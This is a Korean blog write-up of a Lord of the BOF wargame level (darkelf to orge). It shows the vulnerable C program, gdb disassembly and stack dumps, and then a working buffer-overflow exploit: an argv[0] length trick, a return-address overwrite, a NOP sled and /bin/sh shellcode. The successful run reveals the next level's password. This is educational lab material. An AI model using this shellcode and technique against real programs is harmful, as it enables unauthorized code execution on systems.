시스템 해킹/LOB

[LOB] darkelf → orge

ruming 2021. 2. 22. 20:15

darkelf / kernel crashed 로 접속

bash2

 

orge.c

[darkelf@localhost darkelf]$ cat orge.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - orge
        - check argv[0]
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // here is changed!
        if(strlen(argv[0]) != 77){
                printf("argv[0] error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);
}

저번 문제와 같은 조건에

 

이 부분이 추가되었다.

// here is changed!
    if(strlen(argv[0]) != 77){
    printf("argv[0] error\n");
    exit(0);
}

argv[0]은 ./orge부분일텐데 어떻게 77바이트를 맞추는지 모르겠어서 찾아보았다.

심볼릭 링크를 사용하거나 혹은 /를 추가로 사용한다.(/은 많이 와도 상관이 없다고 한다.)

 

다음과 같은 방법을 사용했다. 테스트했는데 argv[0] error가 나지않았다.

[darkelf@localhost darkelf]$ `python -c 'print "./"+"/"*71+"orge"'` hello
stack is still your friend.

 

gdb를 orge2로 실행시켰다가 argv[0] 길이를 어떻게 맞춰야할지 모르겠어서 이름을 A*77로 바꾸고 다시 실행시켜주었다.

[darkelf@localhost darkelf]$ rename orge2 `python -c 'print "A"*77'` orge2
[darkelf@localhost darkelf]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
orge
orge.c
[darkelf@localhost darkelf]$ gdb -q `python -c 'print "A"*77'`
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
...
0x80485dd <main+221>:   mov    %edx,DWORD PTR [%eax]
0x80485df <main+223>:   push   %edx
0x80485e0 <main+224>:   call   0x80483f0 <strlen>
0x80485e5 <main+229>:   add    %esp,4
0x80485e8 <main+232>:   mov    %eax,%eax
0x80485ea <main+234>:   cmp    %eax,48
0x80485ed <main+237>:   jbe    0x8048606 <main+262>
0x80485ef <main+239>:   push   0x80486c8
0x80485f4 <main+244>:   call   0x8048410 <printf>
0x80485f9 <main+249>:   add    %esp,4
0x80485fc <main+252>:   push   0
0x80485fe <main+254>:   call   0x8048420 <exit>
0x8048603 <main+259>:   add    %esp,4
0x8048606 <main+262>:   mov    %eax,DWORD PTR [%ebp+12]
0x8048609 <main+265>:   add    %eax,4
0x804860c <main+268>:   mov    %edx,DWORD PTR [%eax]
0x804860e <main+270>:   push   %edx
0x804860f <main+271>:   lea    %eax,[%ebp-40]
0x8048612 <main+274>:   push   %eax
0x8048613 <main+275>:   call   0x8048440 <strcpy>
0x8048618 <main+280>:   add    %esp,8
0x804861b <main+283>:   lea    %eax,[%ebp-40]
0x804861e <main+286>:   push   %eax
---Type <return> to continue, or q <return> to quit---
0x804861f <main+287>:   push   0x80486df
0x8048624 <main+292>:   call   0x8048410 <printf>
0x8048629 <main+297>:   add    %esp,8
0x804862c <main+300>:   push   40
0x804862e <main+302>:   push   0
0x8048630 <main+304>:   lea    %eax,[%ebp-40]
0x8048633 <main+307>:   push   %eax
0x8048634 <main+308>:   call   0x8048430 <memset>
0x8048639 <main+313>:   add    %esp,12
0x804863c <main+316>:   leave
0x804863d <main+317>:   ret
0x804863e <main+318>:   nop
0x804863f <main+319>:   nop
End of assembler dump.

main+280에 bp를 걸겠다.

 

실행하려다가 이름을 잘못 바꿨다는 걸 깨달았다. 실행될 때 /home/darkelf/이름 으로 실행되니 13바이트를 뺀 A로 다시 저장했다. gdb를 다시 실행하고 조건에 맞게 실행시켰다.

(gdb) r `python -c 'print "\xbf"*48'` `python -c 'print "B"*100'`
Starting program: /home/darkelf/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAA `python -c 'print "\xbf"*48'` `python -c 'print "B"*100'`

Breakpoint 1, 0x8048618 in main ()

 

(gdb) x/200x $esp
0xbffff9d4:     0xbffff9e0      0xbffffba1      0x00000015      0xbfbfbfbf
0xbffff9e4:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffff9f4:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffa04:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0x00000000
0xbffffa14:     0xbffffa54      0xbffffa64      0x40013868      0x00000003
0xbffffa24:     0x08048450      0x00000000      0x08048471      0x08048500
0xbffffa34:     0x00000003      0xbffffa54      0x08048390      0x0804866c
0xbffffa44:     0x4000ae60      0xbffffa4c      0x40013e90      0x00000003
0xbffffa54:     0xbffffb53      0xbffffba1      0xbffffbd2      0x00000000
0xbffffa64:     0xbffffc37      0xbffffc59      0xbffffc63      0xbffffc71
0xbffffa74:     0xbffffc90      0xbffffca0      0xbffffcb9      0xbffffcd6
0xbffffa84:     0xbffffcf5      0xbffffd00      0xbffffd0e      0xbffffd51
0xbffffa94:     0xbffffd64      0xbffffd79      0xbffffd89      0xbffffd96
0xbffffaa4:     0xbffffdb5      0xbffffdc0      0xbffffdd1      0xbffffde3
0xbffffab4:     0xbffffdeb      0x00000000      0x00000003      0x08048034
0xbffffac4:     0x00000004      0x00000020      0x00000005      0x00000006
0xbffffad4:     0x00000006      0x00001000      0x00000007      0x40000000
0xbffffae4:     0x00000008      0x00000000      0x00000009      0x08048450
0xbffffaf4:     0x0000000b      0x000001fa      0x0000000c      0x000001fa
0xbffffb04:     0x0000000d      0x000001fa      0x0000000e      0x000001fa
0xbffffb14:     0x00000010      0x0f8bfbff      0x0000000f      0xbffffb4e
0xbffffb24:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb34:     0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffb44:     0x00000000      0x00000000      0x36690000      0x2f003638
0xbffffb54:     0x656d6f68      0x7261642f      0x666c656b      0x4141412f
0xbffffb64:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffb74:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffb84:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffb94:     0x41414141      0x41414141      0x41414141      0xbfbfbf00
0xbffffba4:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffbb4:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffbc4:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0x424200bf
0xbffffbd4:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffbe4:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffbf4:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffc04:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffc14:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffc24:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffffc34:     0x00004242      0x00000000      0x00000000      0x00000000
0xbffffc44:     0x00000000      0x00000000      0x00000000      0x00000000
...

0xbffffc04의 주소로 넣겠다.

 

`python -c 'print "."+"/"*72+"orge"'` `python -c 'print "A"*44+"\x04\xfc\xff\xbf "+"\x90"*10000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

계속되는 실패로 인해 그냥 심볼릭 링크를 만들기로 했다.

 

ln -s orge `python -c 'print "A"*75'`

다시 조건에 맞춰서 argv[2]에 nop와 쉘코드를 넣었다.

`python -c 'print "./"+"B"*75'` `python -c 'print "A"*47+"\xbf "+"\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

Segmentation fault (core dumped)

 

core 분석

[darkelf@localhost darkelf]$ gdb -c core -q
Core was generated by `./BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB A'.
Program terminated with signal 11, Segmentation fault.
#0  0xbf414141 in ?? ()
(gdb) x/200x $esp
0xbffff630:     0x00000000      0xbffff674      0xbffff684      0x40013868
0xbffff640:     0x00000003      0x08048450      0x00000000      0x08048471
0xbffff650:     0x08048500      0x00000003      0xbffff674      0x08048390
0xbffff660:     0x0804866c      0x4000ae60      0xbffff66c      0x40013e90
0xbffff670:     0x00000003      0xbffff766      0xbffff7b4      0xbffff7e5
0xbffff680:     0x00000000      0xbffffbe7      0xbffffbf9      0xbffffc12
0xbffff690:     0xbffffc31      0xbffffc53      0xbffffc60      0xbffffe23
0xbffff6a0:     0xbffffe42      0xbffffe5f      0xbffffe74      0xbffffe93
0xbffff6b0:     0xbffffe9e      0xbffffeae      0xbffffeb6      0xbffffec0
0xbffff6c0:     0xbffffed0      0xbffffede      0xbffffeec      0xbffffefd
0xbffff6d0:     0xbfffff08      0xbfffff1b      0xbfffff5e      0x00000000
0xbffff6e0:     0x00000003      0x08048034      0x00000004      0x00000020
0xbffff6f0:     0x00000005      0x00000006      0x00000006      0x00001000
0xbffff700:     0x00000007      0x40000000      0x00000008      0x00000000
0xbffff710:     0x00000009      0x08048450      0x0000000b      0x000001fa
0xbffff720:     0x0000000c      0x000001fa      0x0000000d      0x000001fa
0xbffff730:     0x0000000e      0x000001fa      0x00000010      0x0f8bfbff
0xbffff740:     0x0000000f      0xbffff761      0x00000000      0x00000000
0xbffff750:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff760:     0x38366900      0x2f2e0036      0x42424242      0x42424242
0xbffff770:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffff780:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffff790:     0x42424242      0x42424242      0x42424242      0x42424242
---Type <return> to continue, or q <return> to quit---
0xbffff7a0:     0x42424242      0x42424242      0x42424242      0x42424242
0xbffff7b0:     0x00424242      0x41414141      0x41414141      0x41414141
0xbffff7c0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7d0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7e0:     0xbf414141      0x90909000      0x90909090      0x90909090
0xbffff7f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff800:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff810:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff820:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff830:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff840:     0x90909090      0x90909090      0x90909090      0x90909090
...

nop가 들어있는 주소 중 하나인 0xbffff830을 넣어보겠다.

 

dummy(44) + nop 주소 + nop(1000) + shellcode

[darkelf@localhost darkelf]$ `python -c 'print "./"+"A"*75'` `python -c 'print "A"*44+"\x30\xf8\xff\xbf "+"\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0??
bash$ my-pass
euid = 507
timewalker

드디어 공격에 성공했다!!!

timewalker

 

 

'시스템 해킹 > LOB' 카테고리의 다른 글

[LOB] troll → vampire  (0) 2021.02.27
[LOB] orge → troll  (0) 2021.02.24
[LOB] wolfman → darkelf  (0) 2021.02.22
[LOB] orc → wolfman  (0) 2021.02.21
[LOB] goblin → orc  (0) 2021.02.21